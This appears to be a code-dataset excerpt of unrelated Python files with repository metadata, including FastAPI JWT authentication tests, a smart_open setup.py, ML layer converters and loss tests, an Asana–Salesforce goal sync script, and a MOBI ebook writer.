assert get.json()["detail"] == "Invalid token"
def test_disabled_user(client, db):
create_test_user(db, "johndoe", "abcd1234")
# Attempt to authenticate
auth = client.post("/api/auth", data={"username": "johndoe", "password": "abcd1234"})
access_token = auth.json()["access_token"]
assert auth.status_code == status.HTTP_200_OK
assert auth.json()["token_type"] == "bearer"
assert access_token
# Attempt to use the token to access a protected API endpoint
headers = {"Authorization": f"Bearer {access_token}"}
get = client.get("/api/user/", headers=headers)
assert get.status_code == status.HTTP_200_OK
assert len(get.json()) == 1
# Disable the user
user_uuid = get.json()[0]["uuid"]
update = client.patch(f"/api/user/{user_uuid}", headers=headers, json={"enabled": False})
assert update.status_code == status.HTTP_204_NO_CONTENT
# The user is disabled, but the token is still valid, so they will still have access until it expires.
get = client.get("/api/user/", headers=headers)
assert get.status_code == status.HTTP_200_OK
assert len(get.json()) == 1
# However, they will not be able to authenticate again to receive a new token.
auth = client.post("/api/auth", data={"username": "johndoe", "password": "abcd1234"})
assert auth.status_code == status.HTTP_401_UNAUTHORIZED
assert auth.json()["detail"] == "Invalid username or password"
def test_expired_token(client, db, monkeypatch):
def mock_get_settings():
settings = Settings()
settings.jwt_access_expire_seconds = 1
return settings
# Patching __code__ works no matter how the function is imported
monkeypatch.setattr("core.config.get_settings.__code__", mock_get_settings.__code__)
create_test_user(db, "johndoe", "abcd1234")
# Attempt to authenticate
auth = client.post("/api/auth", data={"username": "johndoe", "password": "abcd1234"})
access_token = auth.json()["access_token"]
assert auth.status_code == status.HTTP_200_OK
assert auth.json()["token_type"] == "bearer"
assert access_token
# Attempt to use the token to access a protected API endpoint
get = client.get("/api/user/", headers={"Authorization": f"Bearer {access_token}"})
assert get.status_code == status.HTTP_200_OK
assert len(get.json()) == 1
# Wait for the token to expire
time.sleep(2)
# Attempt to use the token to access a protected API endpoint now that the token is expired
get = client.get("/api/user/", headers={"Authorization": f"Bearer {access_token}"})
assert get.status_code == status.HTTP_401_UNAUTHORIZED
assert get.json()["detail"] == "Access token expired"
@pytest.mark.parametrize(
"key",
[
("username"),
("password"),
],
)
def test_missing_required_fields(client, key):
create_json = {"username": "johndoe", "password": "abcd1234"}
del create_json[key]
create = client.post("/api/auth", json=create_json)
assert create.status_code == status.HTTP_422_UNPROCESSABLE_ENTITY
def test_missing_token(client):
# Attempt to access a protected API endpoint without supplying an access token
get = client.get("/api/user/")
assert get.status_code == status.HTTP_401_UNAUTHORIZED
assert get.json()["detail"] == "Not authenticated"
def test_wrong_token_type(client, db):
create_test_user(db, "johndoe", "abcd1234")
# Attempt to authenticate
auth = client.post("/api/auth", data={"username": "johndoe", "password": "abcd1234"})
refresh_token = auth.json()["refresh_token"]
assert auth.status_code == status.HTTP_200_OK
assert auth.json()["token_type"] == "bearer"
assert refresh_token
# Attempt to use the refresh token to access a protected API endpoint
get = client.get("/api/user/", headers={"Authorization": f"Bearer {refresh_token}"})
assert get.status_code == status.HTTP_401_UNAUTHORIZED
assert get.json()["detail"] == "Invalid token type"
@pytest.mark.parametrize(
"route",
[route for route in app.routes if route.path.startswith("/api/")],
)
def test_missing_route_authentication(client, route):
"""
This tests every registered API endpoint to ensure that it requires token authentication.
"""
# There are some special endpoints that do not require authentication.
if route.path in ["/api/ping", "/api/auth", "/api/auth/logout"]:
return
for method in route.methods:
if method == "POST":
client_method = client.post
elif method == "GET":
client_method = client.get
elif method == "PATCH":
client_method = client.patch
elif method == "DELETE":
client_method = client.delete
else:
raise ValueError(f"Test does not account for method: {method}")
result = client_method(route.path)
assert result.status_code == status.HTTP_401_UNAUTHORIZED, f"{method} on {route.path} does not require auth!"
#
# VALID TESTS
#
def test_auth_success(client: testclient.TestClient, db):
create_test_user(db, "johndoe", "abcd1234")
# Attempt to authenticate
auth = client.post("/api/auth", data={"username": "johndoe", "password": "abcd1234"})
access_token = auth.json()["access_token"]
refresh_token = auth.json()["refresh_token"]
assert auth.status_code == status.HTTP_200_OK
assert auth.json()["token_type"] == "bearer"
assert access_token
assert refresh_token
assert auth.cookies.get("access_token")
assert auth.cookies.get("refresh_token")
# Attempt to use the token to access a protected API endpoint
get = client.get("/api/user/", headers={"Authorization": f"Bearer {access_token}"})
assert get.status_code == status.HTTP_200_OK
assert len(get.json()) == 1
| 35.375
| 117
| 0.684776
|
afb298e8268114b83aaa96c02238bc5f0ffa86e7
| 2,757
|
py
|
Python
|
setup.py
|
derpferd/smart_open
|
8f64d5b491b3f2f559059f8e16755e30ad2382fa
|
[
"MIT"
] | null | null | null |
setup.py
|
derpferd/smart_open
|
8f64d5b491b3f2f559059f8e16755e30ad2382fa
|
[
"MIT"
] | null | null | null |
setup.py
|
derpferd/smart_open
|
8f64d5b491b3f2f559059f8e16755e30ad2382fa
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015 Radim Rehurek <me@radimrehurek.com>
#
# This code is distributed under the terms and conditions
# from the MIT License (MIT).
import io
import os
import sys
from setuptools import setup, find_packages
def _get_version():
curr_dir = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(curr_dir, 'smart_open', 'version.py')) as fin:
#
# __version__ = '1.8.4'
#
line = fin.readline().strip()
parts = line.split(' ')
assert parts[0] == '__version__'
assert parts[1] == '='
return parts[2][1:-1]
#
# We cannot do "from smart_open.version import __version__" because that will
# require the dependencies for smart_open to already be in place, and that is
# not necessarily the case when running setup.py for the first time.
#
__version__ = _get_version()
def read(fname):
return io.open(os.path.join(os.path.dirname(__file__), fname), encoding='utf-8').read()
tests_require = [
'mock',
'moto[server]',
'pathlib2',
'responses',
'boto3',
# Not used directly but allows boto GCE plugins to load.
# https://github.com/GoogleCloudPlatform/compute-image-packages/issues/262
'google-compute-engine==2.8.12'
]
install_requires = [
'boto >= 2.32',
'requests',
'boto3',
]
if sys.version_info[0] == 2:
install_requires.append('bz2file')
setup(
name='smart_open',
version=__version__,
description='Utils for streaming large files (S3, HDFS, gzip, bz2...)',
long_description=read('README.rst'),
packages=find_packages(),
package_data={
"smart_open.tests": ["test_data/*gz"],
},
author='Radim Rehurek',
author_email='me@radimrehurek.com',
maintainer='Radim Rehurek',
maintainer_email='me@radimrehurek.com',
url='https://github.com/piskvorky/smart_open',
download_url='http://pypi.python.org/pypi/smart_open',
keywords='file streaming, s3, hdfs',
license='MIT',
platforms='any',
install_requires=install_requires,
tests_require=tests_require,
extras_require={
'test': tests_require,
},
test_suite="smart_open.tests",
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Topic :: System :: Distributed Computing',
'Topic :: Database :: Front-Ends',
],
)
| 25.766355
| 91
| 0.636924
|
00ed16733bf43d576cddf829ce6f7e6529a2e296
| 4,230
|
py
|
Python
|
mp/core/io.py
|
kerryeon/mp_python
|
1aca4069bc635959fa4f3ce94507c55226219039
|
[
"MIT"
] | 1
|
2021-04-08T01:59:11.000Z
|
2021-04-08T01:59:11.000Z
|
mp/core/io.py
|
kerryeon/mp_python
|
1aca4069bc635959fa4f3ce94507c55226219039
|
[
"MIT"
] | null | null | null |
mp/core/io.py
|
kerryeon/mp_python
|
1aca4069bc635959fa4f3ce94507c55226219039
|
[
"MIT"
] | null | null | null |
import os
from mp.core.expression import Expression as Exp
from mp.core.framework import np
class IO:
def __init__(self, dir_main: str, permission: int = 0o775):
if len(dir_main) == 0:
dir_main = os.path.curdir
self.dir_main = dir_main
self.permission = permission
def get(self, item: str):
path = self.get_path(item)
# is graph file
path_graph = self._get_graph_path(path)
if os.path.exists(path_graph):
return self._load_graph(path_graph)
# is binary file
path_binary = self._get_binary_path(path)
if os.path.exists(path_binary):
return self._load_binary(item, path_binary)
# not found
return None
def set(self, item: str, toward):
paths = item.split('.')
# if toward is None -> remove file
if toward is None:
path_graph = '%s.%s' % (self.get_path(item), Exp.EXTENSION_SOURCE)
path_graph = os.path.join(self.dir_main, path_graph)
if os.path.exists(path_graph):
self._remove(path_graph)
self._remove_dirs(paths)
path_binary = '%s.%s' % (self.get_path(item), Exp.EXTENSION_BINARY)
path_binary = os.path.join(self.dir_main, path_binary)
if os.path.exists(path_binary):
self._remove(path_binary)
self._remove_dirs(paths)
# if toward is constant
elif toward.is_constant:
path = '%s.%s' % (self.get_path(item), Exp.EXTENSION_BINARY)
path = os.path.join(self.dir_main, path)
self.make_dir_recursive(paths, self.dir_main, self.permission)
self._save_binary(path, toward.get_value())
# if toward consists of graph
else:
path = '%s.%s' % (self.get_path(item), Exp.EXTENSION_SOURCE)
path = os.path.join(self.dir_main, path)
self.make_dir_recursive(paths, self.dir_main, self.permission)
self._save_graph(path, toward.code)
@classmethod
def _load_binary_raw(cls, path):
return np.load(path)
@classmethod
def _load_binary(cls, name: str, path: str):
if os.path.exists(path):
with open(path, 'rb') as f:
value = cls._load_binary_raw(f)
return value
return None
@classmethod
def _load_graph(cls, path: str):
if os.path.exists(path):
with open(path, 'r') as f:
msg = f.read()
return msg
return None
@classmethod
def _save_binary(cls, path: str, value):
np.save(path, value, allow_pickle=False)
@classmethod
def _save_graph(cls, path: str, code: str):
with open(path, 'w') as f:
f.write(code)
@classmethod
def _remove(cls, path: str):
os.remove(path)
def _remove_dirs(self, paths):
paths = paths[:-1]
for i in range(len(paths), 0, -1):
path = self.dir_main
for dir_to in paths[:i]:
path = os.path.join(path, dir_to)
num_files = len(os.listdir(path))
# if dir is empty
if os.path.isdir(path) and num_files == 0:
os.rmdir(path)
else:
break
def _get_binary_path(self, path: str):
path = '%s.%s' % (path, Exp.EXTENSION_BINARY)
path = os.path.join(self.dir_main, path)
return path
def _get_graph_path(self, path: str):
path = '%s.%s' % (path, Exp.EXTENSION_SOURCE)
path = os.path.join(self.dir_main, path)
return path
@classmethod
def make_dir_recursive(cls, paths, dir_from=None, permission=0o775):
path = dir_from if dir_from is not None else ''
for dir_name in paths[:-1]:
path = os.path.join(path, dir_name)
if not os.path.exists(path):
os.mkdir(path, mode=permission)
@classmethod
def get_path(cls, filename, dir_from=None):
filename = '/'.join(filename.split('.'))
if dir_from is None:
return filename
dir_from = '/'.join(dir_from.split('.'))
return os.path.join(dir_from, filename)
| 33.571429
| 79
| 0.576832
|
07578e6deca671fd66928ce73a3335fb19697f29
| 5,815
|
py
|
Python
|
python/oneflow/compatible/single_client/test/ops/test_bce_loss.py
|
wangyuyue/oneflow
|
0a71c22fe8355392acc8dc0e301589faee4c4832
|
[
"Apache-2.0"
] | 1
|
2021-09-13T02:34:53.000Z
|
2021-09-13T02:34:53.000Z
|
python/oneflow/compatible/single_client/test/ops/test_bce_loss.py
|
wangyuyue/oneflow
|
0a71c22fe8355392acc8dc0e301589faee4c4832
|
[
"Apache-2.0"
] | null | null | null |
python/oneflow/compatible/single_client/test/ops/test_bce_loss.py
|
wangyuyue/oneflow
|
0a71c22fe8355392acc8dc0e301589faee4c4832
|
[
"Apache-2.0"
] | null | null | null |
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import unittest
from collections import OrderedDict
from typing import Dict
import numpy as np
from test_util import GenArgList
import oneflow.compatible.single_client.unittest
from oneflow.compatible import single_client as flow
from oneflow.compatible.single_client import typing as tp
def _compare_bceloss_with_np(
input_shape, target_shape, weight_shape, device_type, machine_ids, device_counts
):
input = np.random.random(size=input_shape).astype(np.float32)
target = np.random.random(size=target_shape).astype(np.float32)
weight = np.random.random(size=weight_shape).astype(np.float32)
assert device_type in ["cpu", "gpu"]
flow.clear_default_session()
if device_type == "cpu":
flow.config.cpu_device_num(device_counts)
else:
flow.config.gpu_device_num(device_counts)
func_config = flow.FunctionConfig()
func_config.default_placement_scope(flow.scope.placement(device_type, machine_ids))
def np_bceloss(np_input, np_target, np_weight):
np_bce = -np_weight * (
np_target * np.log(np_input) + (1 - np_target) * np.log(1 - np_input)
)
np_bce_mean = np.mean(np_bce)
np_bce_sum = np.sum(np_bce)
return {
"np_bce_loss": np_bce,
"np_bce_loss_mean": np_bce_mean,
"np_bce_loss_sum": np_bce_sum,
}
def np_bce_loss_diff(np_input, np_target, np_weight):
elemcnt = np_target.size
np_bce_grad_mean = (
-(np_weight / elemcnt)
* (np_target - np_input)
/ ((1 - np_input) * np_input)
)
return {"np_bce_grad_mean": np_bce_grad_mean}
np_out_bceloss_dict = np_bceloss(input, target, weight)
np_grad_dict = np_bce_loss_diff(input, target, weight)
def assert_prediction_grad(blob: tp.Numpy):
assert np.allclose(blob, np_grad_dict["np_bce_grad_mean"])
@flow.global_function(type="train", function_config=func_config)
def oneflow_bceloss(
of_input: tp.Numpy.Placeholder(shape=input.shape),
of_target: tp.Numpy.Placeholder(shape=target.shape),
of_weight: tp.Numpy.Placeholder(shape=weight.shape),
) -> Dict[str, tp.Numpy]:
with flow.scope.placement(device_type, "0:0"):
v = flow.get_variable(
shape=input.shape,
dtype=flow.float32,
initializer=flow.zeros_initializer(),
name="v",
)
x_var = of_input + v
flow.watch_diff(x_var, assert_prediction_grad)
bceloss = flow.nn.BCELoss(
x_var, of_target, of_weight, reduction="none", name="of_mseloss"
)
bceloss_mean = flow.nn.BCELoss(
x_var, of_target, of_weight, reduction="mean", name="of_mseloss_reduce_mean"
)
bceloss_sum = flow.nn.BCELoss(
x_var, of_target, of_weight, reduction="sum", name="of_mseloss_reduce_sum"
)
with flow.scope.placement(device_type, "0:0"):
flow.optimizer.SGD(
flow.optimizer.PiecewiseConstantScheduler([], [0.001]), momentum=0
).minimize(bceloss_mean)
return {
"of_bce_loss": bceloss,
"of_bce_loss_mean": bceloss_mean,
"of_bce_loss_sum": bceloss_sum,
}
of_out_bceloss_dict = oneflow_bceloss(input, target, weight)
assert np.allclose(
of_out_bceloss_dict["of_bce_loss"], np_out_bceloss_dict["np_bce_loss"]
)
assert np.allclose(
of_out_bceloss_dict["of_bce_loss_mean"],
np_out_bceloss_dict["np_bce_loss_mean"],
)
assert np.allclose(
of_out_bceloss_dict["of_bce_loss_sum"], np_out_bceloss_dict["np_bce_loss_sum"],
)
def _gen_arg_dict(shape, device_type, machine_ids, device_counts):
arg_dict = OrderedDict()
arg_dict["input_shape"] = [shape]
arg_dict["target_shape"] = [shape]
arg_dict["weight_shape"] = [shape]
arg_dict["device_type"] = [device_type]
arg_dict["machine_ids"] = [machine_ids]
arg_dict["device_counts"] = [device_counts]
return arg_dict
@flow.unittest.skip_unless_1n1d()
class Testbceloss1n1d(flow.unittest.TestCase):
def test_bceloss_cpu(test_case):
arg_dict = _gen_arg_dict(
shape=(3, 3), device_type="cpu", machine_ids="0:0", device_counts=1
)
for arg in GenArgList(arg_dict):
_compare_bceloss_with_np(*arg)
@unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
def test_bceloss_gpu(test_case):
arg_dict = _gen_arg_dict(
shape=(3, 16, 32), device_type="gpu", machine_ids="0:0", device_counts=1
)
for arg in GenArgList(arg_dict):
_compare_bceloss_with_np(*arg)
@flow.unittest.skip_unless_1n2d()
class Testbceloss1n2d(flow.unittest.TestCase):
@unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
def test_bceloss_gpu_1n2d(test_case):
arg_dict = _gen_arg_dict(
shape=(3, 16, 16), device_type="gpu", machine_ids="0:0-1", device_counts=2
)
for arg in GenArgList(arg_dict):
_compare_bceloss_with_np(*arg)
if __name__ == "__main__":
unittest.main()
| 36.118012
| 88
| 0.672227
|
26d122a6a49b1c4dce691898b25ed907e2bb0259
| 900
|
py
|
Python
|
src/dxtbx/format/FormatCBFMiniPilatusSPring8_6MSN125.py
|
toastisme/dxtbx
|
fc24e215a8052e7e17be4ad4b41f9dbb474d852a
|
[
"BSD-3-Clause"
] | 3
|
2019-08-16T05:46:29.000Z
|
2020-09-18T08:38:37.000Z
|
src/dxtbx/format/FormatCBFMiniPilatusSPring8_6MSN125.py
|
toastisme/dxtbx
|
fc24e215a8052e7e17be4ad4b41f9dbb474d852a
|
[
"BSD-3-Clause"
] | 448
|
2019-04-06T01:20:56.000Z
|
2022-03-31T15:58:48.000Z
|
src/dxtbx/format/FormatCBFMiniPilatusSPring8_6MSN125.py
|
toastisme/dxtbx
|
fc24e215a8052e7e17be4ad4b41f9dbb474d852a
|
[
"BSD-3-Clause"
] | 10
|
2019-04-08T13:30:32.000Z
|
2021-09-30T14:48:50.000Z
|
from dxtbx.format.FormatCBFMiniPilatus import FormatCBFMiniPilatus
class FormatCBFMiniPilatusSPring8_6MSN125(FormatCBFMiniPilatus):
"""A class for reading mini CBF format Pilatus images for 6M SN 125, normally
at Spring8 BL41XU"""
@staticmethod
def understand(image_file):
"""Check to see if this looks like an Pilatus mini CBF format image,
i.e. we can make sense of it."""
header = FormatCBFMiniPilatus.get_cbf_header(image_file)
for record in header.split("\n"):
if (
"# Detector" in record
and "PILATUS" in record
and "S/N 60-0125" in header
):
return True
return False
def _goniometer(self):
"""Return a model for a simple single-axis reversed direction goniometer."""
return self._goniometer_factory.single_axis_reverse()
| 31.034483
| 84
| 0.641111
|
ed1dec2d46ebc4640a424e6cab39c5da0b92720a
| 3,502
|
py
|
Python
|
onnx2keras/normalization_layers.py
|
ag169/onnx2keras
|
0c817fb7bd776f38bab0fcca00b1af26753bf02f
|
[
"MIT"
] | 2
|
2021-04-24T00:57:53.000Z
|
2021-11-17T11:27:15.000Z
|
onnx2keras/normalization_layers.py
|
ag169/onnx2keras
|
0c817fb7bd776f38bab0fcca00b1af26753bf02f
|
[
"MIT"
] | null | null | null |
onnx2keras/normalization_layers.py
|
ag169/onnx2keras
|
0c817fb7bd776f38bab0fcca00b1af26753bf02f
|
[
"MIT"
] | null | null | null |
import keras.layers
import logging
from .utils import ensure_tf_type, ensure_numpy_type
def convert_batchnorm(node, params, layers, node_name):
"""
Convert BatchNorm2d layer
:param node: current operation node
:param params: operation attributes
:param layers: available keras layers
:param node_name: resulting layer name
:return: None
"""
logger = logging.getLogger('onnx2keras:batchnorm2d')
input_0 = ensure_tf_type(layers[node.input[0]])
if len(node.input) == 5:
weights = [
ensure_numpy_type(layers[node.input[1]]),
ensure_numpy_type(layers[node.input[2]]),
ensure_numpy_type(layers[node.input[3]]),
ensure_numpy_type(layers[node.input[4]])
]
elif len(node.input) == 3:
weights = [
ensure_numpy_type(layers[node.input[1]]),
ensure_numpy_type(layers[node.input[2]])
]
else:
raise AttributeError('Unknown arguments for batch norm')
eps = params['epsilon'] if 'epsilon' in params else 1e-05 # default epsilon
momentum = params['momentum'] if 'momentum' in params else 0.9 # default momentum
if len(weights) == 2:
logger.debug('Batch normalization without running averages')
bn = keras.layers.BatchNormalization(
axis=1, momentum=momentum, epsilon=eps,
center=False, scale=False,
weights=weights,
name=node_name
)
else:
bn = keras.layers.BatchNormalization(
axis=1, momentum=momentum, epsilon=eps,
weights=weights,
name=node_name
)
layers[node_name] = bn(input_0)
def convert_instancenorm(node, params, layers, node_name):
"""
Convert InstanceNorm2d layer
:param node: current operation node
:param params: operation attributes
:param layers: available keras layers
:param node_name: resulting layer name
:return: None
"""
logger = logging.getLogger('onnx2keras:instancenorm2d')
input_0 = ensure_tf_type(layers[node.input[0]])
if len(node.input) == 3:
gamma = ensure_numpy_type(layers[node.input[1]])
beta = ensure_numpy_type(layers[node.input[2]])
else:
raise AttributeError('Unknown arguments for batch norm')
def target_layer(x, epsilon=params['epsilon'], gamma=gamma, beta=beta):
import tensorflow as tf
from keras import backend as K
data_format = 'NCHW' if K.image_data_format() == 'channels_first' else 'NHWC'
layer = tf.contrib.layers.instance_norm(
x,
param_initializers={'beta': tf.constant_initializer(beta), 'gamma': tf.constant_initializer(gamma)},
epsilon=epsilon, data_format=data_format,
trainable=False
)
return layer
lambda_layer = keras.layers.Lambda(target_layer, name=node_name)
layers[node_name] = lambda_layer(input_0)
def convert_dropout(node, params, layers, node_name):
"""
Convert Dropout layer
:param node: current operation node
:param params: operation attributes
:param layers: available keras layers
:param node_name: resulting layer name
:return: None
"""
logger = logging.getLogger('onnx2keras:dropout')
input_0 = ensure_tf_type(layers[node.input[0]])
ratio = params['ratio'] if 'ratio' in params else 0.0
lambda_layer = keras.layers.Dropout(ratio, name=node_name)
layers[node_name] = lambda_layer(input_0)
| 32.728972
| 112
| 0.655625
|
a43ce84b8f270025748ed891e957a0cbf5e41c0a
| 6,888
|
py
|
Python
|
python/goals-api-sfdc/src/asana_goals/__main__.py
|
Asana/DevRel-Examples
|
6ac7bcedd3843cfa7ac00bb7df28b886b61e3a6c
|
[
"MIT"
] | 2
|
2018-07-06T20:34:29.000Z
|
2018-07-13T04:05:18.000Z
|
python/goals-api-sfdc/src/asana_goals/__main__.py
|
Asana/DevRel-Examples
|
6ac7bcedd3843cfa7ac00bb7df28b886b61e3a6c
|
[
"MIT"
] | 2
|
2018-07-30T23:32:42.000Z
|
2018-08-01T05:59:29.000Z
|
python/goals-api-sfdc/src/asana_goals/__main__.py
|
Asana/DevRel-Examples
|
6ac7bcedd3843cfa7ac00bb7df28b886b61e3a6c
|
[
"MIT"
] | 1
|
2018-07-03T03:30:25.000Z
|
2018-07-03T03:30:25.000Z
|
import logging
import logging.config
from time import time, sleep
from argparse import ArgumentParser
from decimal import Decimal
from typing import Optional, Union, Dict
import toml
from croniter import croniter
from asana_goals.asana import Asana
from asana_goals.asana.goal import Goal
from asana_goals.data_source.salesforce import Salesforce
from asana_goals.initializer import InitializerProcess
AnyNumber = Union[str, int, float, Decimal]
class MainProcess:
"""
Encloses the runtime variables for an instance of this application.
"""
# List of goals we just synced
synced: Dict[str, Goal]
# Indicates if we are running standalone or as a service
service: bool
# These only get used when running as a service
cron: Optional[croniter]
shutdown: Optional[bool]
# These values are loaded from the config file
app: dict
sf: Salesforce
asana: Asana
goals: dict
def __init__(self, config_filename: str, service: bool = False) -> None:
"""
Initialize process instance.
:param config_filename: Application config to read.
:param service: If True, this package will poll based on a given cron
string.
"""
self.synced = {}
self.service = service
self.cron = None
self.shutdown = None
with open(config_filename) as f:
cfg = toml.loads(f.read())
if cfg.get("logging") is not None:
logging.config.dictConfig(cfg["logging"])
else:
logging.basicConfig()
logging.getLogger(__name__).info("Config file loaded")
self.app = cfg["app"]
self.sf = Salesforce(**cfg["salesforce"])
self.asana = Asana(**cfg["asana"])
self.goals = cfg["goals"]
def loop(self) -> None:
"""
Main loop iteration
"""
# Reset synced dict
self.synced = {}
# Sync each goal
for goal in self.app["goals"]:
self.sync_goal(goal)
def sync_goal(self, goal: str) -> Goal:
"""
Synchronize a goal between systems. This fetches the goal updated value
from a data source and uploads the new value to Asana.
:param goal: Goal config key.
:return:
"""
# Handle a double sync
if goal in self.synced:
return self.synced[goal]
# Handle the case where the goal is not configured
try:
goal_obj = self.goals[goal]
except KeyError:
goal_obj = None
logging.getLogger(__name__).error(
"Configuration error: Referenced goal '%s' does not exist.",
goal,
)
exit(-1)
# Update the goal value
value = self.get_value(goal_obj)
if goal_obj["source"] != "asana":
upd = self.asana.set_metric_current_value(goal_obj["goal_id"], value)
logging.getLogger(__name__).info(
"Updating goal '%s' value to '%s'",
goal, value,
)
else:
upd = self.asana.get_metric_current_value(goal_obj["goal_id"])
upd = self.asana.update_goal_status(goal_obj["goal_id"], upd.assess_status())
# Remember we just synced this Goal
self.synced[goal] = upd
return upd
def get_value(self, goal_obj: dict) -> AnyNumber:
"""
Gets a the new value for the given goal dict using a handler function
depending on said goal's source.
:param goal_obj: Configured goal
:return:
"""
source = goal_obj["source"]
# Get a handler function depending on where this goal is coming from
f = getattr(self, "get_value_" + source)
if f is None:
raise KeyError(f"Source {source} not managed.")
# Use the handle function to get the updated value
return f(goal_obj)
def get_value_composite(self, goal_obj: dict) -> AnyNumber:
"""
Gets a new value calculated from multiple subgoals.
"""
subsum = 0
for subgoal, weight in zip(goal_obj["subgoals"], goal_obj["weights"]):
sg = self.sync_goal(subgoal)
subsum += (sg.current_value / sg.target_value) * weight
return subsum
def get_value_fixed(self, goal_obj: dict) -> AnyNumber:
"""
Gets a fixed value from config.
"""
return goal_obj["value"]
def get_value_salesforce_report(self, goal_obj: dict) -> AnyNumber:
"""
Gets a new value from a Salesforce report aggregate.
"""
rpt = self.sf.get_report(goal_obj["sf_report_id"])
return rpt.get_metric(goal_obj["sf_metric"])
def get_value_asana(self, goal_obj: dict) -> AnyNumber:
"""
Gets latest value from Asana goals.
"""
rpt = self.asana.get_metric_current_value(goal_obj["goal_id"])
return 1.1
def main(self) -> int:
"""
Main function. Return exit status code.
"""
if self.service:
self.shutdown = False
self.cron = croniter(self.app["cron_string"])
next_run = self.cron.get_next()
while not self.shutdown:
if time() > next_run:
self.loop()
next_run = self.cron.get_next()
sleep(5)
else:
self.loop()
return 0
def setup_argument_parser(parser: ArgumentParser):
parser.add_argument(
"config_file",
nargs="?",
help="set a different config file instead of config.toml in current working directory",
default="./config.toml"
)
parser.add_argument(
"-s", "--service",
help="runs this program as a background service",
action="store_true"
)
parser.add_argument(
"-i", "--initialize",
help="using the provided access token, helps to generate goal entries "
"in Asana and a config file referencing them",
metavar="ACCESS_TOKEN"
)
parser.add_argument(
"-w", "--workspace",
help="workspace for the initializer",
metavar="WORKSPACE_GID",
)
parser.add_argument(
"-t", "--time_period",
help="time period for the initializer",
metavar="TIME_PERIOD_GID",
)
def main():
parser = ArgumentParser()
setup_argument_parser(parser)
args = parser.parse_args()
if args.initialize:
process = InitializerProcess(
args.config_file, args.initialize, args.workspace, args.time_period
)
else:
process = MainProcess(args.config_file, args.service)
status = process.main()
logging.getLogger(__name__).info("Process finished, shutting down.")
exit(status)
if __name__ == "__main__":
main()
| 31.027027
| 95
| 0.594367
|
8712dee1aa80a32d2ac6e789d04576d4e0af2ec7
| 1,519
|
py
|
Python
|
venv/Lib/site-packages/numpy/core/tests/test_cpu_dispatcher.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | 603
|
2020-12-23T13:49:32.000Z
|
2022-03-31T23:38:03.000Z
|
venv/Lib/site-packages/numpy/core/tests/test_cpu_dispatcher.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | 387
|
2020-12-15T14:54:04.000Z
|
2022-03-31T07:00:21.000Z
|
venv/Lib/site-packages/numpy/core/tests/test_cpu_dispatcher.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | 35
|
2021-03-26T03:12:04.000Z
|
2022-03-23T10:15:10.000Z
|
from numpy.core._multiarray_umath import __cpu_features__, __cpu_baseline__, __cpu_dispatch__
from numpy.core import _umath_tests
from numpy.testing import assert_equal
def test_dispatcher():
"""
Testing the utilites of the CPU dispatcher
"""
targets = (
"SSE2", "SSE41", "AVX2",
"VSX", "VSX2", "VSX3",
"NEON", "ASIMD", "ASIMDHP"
)
highest_sfx = "" # no suffix for the baseline
all_sfx = []
for feature in reversed(targets):
# skip baseline features, by the default `CCompilerOpt` do not generate separated objects
# for the baseline, just one object combined all of them via 'baseline' option
# within the configuration statments.
if feature in __cpu_baseline__:
continue
# check compiler and running machine support
if feature not in __cpu_dispatch__ or not __cpu_features__[feature]:
continue
if not highest_sfx:
highest_sfx = "_" + feature
all_sfx.append("func" + "_" + feature)
test = _umath_tests.test_dispatch()
assert_equal(test["func"], "func" + highest_sfx)
assert_equal(test["var"], "var" + highest_sfx)
if highest_sfx:
assert_equal(test["func_xb"], "func" + highest_sfx)
assert_equal(test["var_xb"], "var" + highest_sfx)
else:
assert_equal(test["func_xb"], "nobase")
assert_equal(test["var_xb"], "nobase")
all_sfx.append("func") # add the baseline
assert_equal(test["all"], all_sfx)
| 35.325581
| 97
| 0.646478
|
c267783d2d44e7b9998cb4e8cd27fbdc9de9d6e5
| 13,158
|
py
|
Python
|
fanficfare/mobi.py
|
AlexRiina/FanFicFare
|
2cd6f53f766e74052c6ca7ab5c2eabff24f59742
|
[
"Apache-2.0"
] | 3
|
2020-11-10T16:43:43.000Z
|
2021-04-09T07:12:31.000Z
|
fanficfare/mobi.py
|
AlexRiina/FanFicFare
|
2cd6f53f766e74052c6ca7ab5c2eabff24f59742
|
[
"Apache-2.0"
] | 5
|
2021-11-18T00:20:38.000Z
|
2021-11-18T00:21:40.000Z
|
fanficfare/mobi.py
|
AlexRiina/FanFicFare
|
2cd6f53f766e74052c6ca7ab5c2eabff24f59742
|
[
"Apache-2.0"
] | 1
|
2021-04-08T12:25:09.000Z
|
2021-04-08T12:25:09.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright(c) 2009 Andrew Chatham and Vijay Pandurangan
# Changes Copyright 2018 FanFicFare team
from __future__ import absolute_import
import struct
import time
import random
import logging
# py2 vs py3 transition
from .six import ensure_binary
from io import BytesIO
logger = logging.getLogger(__name__)
from .mobihtml import HtmlProcessor
# http://wiki.mobileread.com/wiki/MOBI
# http://membres.lycos.fr/microfirst/palm/pdb.html
encoding = {
'UTF-8' : 65001,
'latin-1' : 1252,
}
languages = {"en-us" : 0x0409,
"sv" : 0x041d,
"fi" : 0x000b,
"en" : 0x0009,
"en-gb" : 0x0809}
class _SubEntry:
def __init__(self, pos, html_data):
self.pos = pos
self.html = HtmlProcessor(html_data)
self.title = self.html.title
